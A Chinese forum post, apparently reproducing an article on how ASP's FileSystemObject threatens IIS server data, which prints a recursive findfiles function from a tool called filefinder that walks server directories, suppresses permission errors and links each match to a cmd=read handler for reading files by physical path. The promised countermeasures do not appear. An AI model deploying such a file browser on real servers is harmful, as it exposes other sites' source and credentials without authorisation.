ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策
scripting.filesystemobject 对象是由 scrrun.dll 提供的许多供 vbscript/jscript 控制的 com 对象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁。<br /><br />filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。<br /><br />最关键的是 findfiles 函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩展名来搜寻这些文件。<br /><br /> 程序代码 <div><br /><%<br />function findfiles(strstartfolder, strext)<br /><br />dim n<br /><br />dim othisfolder<br /><br />dim ofolders<br /><br />dim ofiles<br /><br />dim ofolder<br /><br />dim ofile<br /><br />' 如果系统管理员对文件系统的权限进行细致的设置话,下面的代码就要出错<br /><br />' 但是有些目录还是可以察看的,所以我们简单的把错误忽略过去<br /><br />on error resume next<br /><br />n = 0<br /><br />response.write "<b>searching " & strstartfolder & "</b><br>"<br /><br />set othisfolder = g_fs.getfolder(strstartfolder)<br /><br />set ofiles = othisfolder.files<br /><br />for each ofile in ofiles<br /><br />' 如果是指定的文件扩展名,输出连接导向本身,但用不同的命令 cmd<br /><br />' 在这里是 cmd=read,即读出指定物理路径的文本文件<br /><br />if issuffix(ofile.path, strext) then<br /><br />response.write "<a target=_blank href='ff.asp?cmd=read&path=" & server.htmlencode(ofile.path) & "'><font color='dodgerblue'>" & ofile.path & "</font></a><br>"<br /><br />if err = 0 then<br /><br />n = n + 1<br /><br />end if<br /><br />end if<br /><br />next<br /><br />set ofolders = othisfolder.subfolders<br /><br />for each ofolder in ofolders<br /><br />n = n + findfiles(ofolder.path, strext)<br /><br />next<br /><br />findfiles = n<br /><br />end function<br />%><br /> 学习一下......
页:
[1]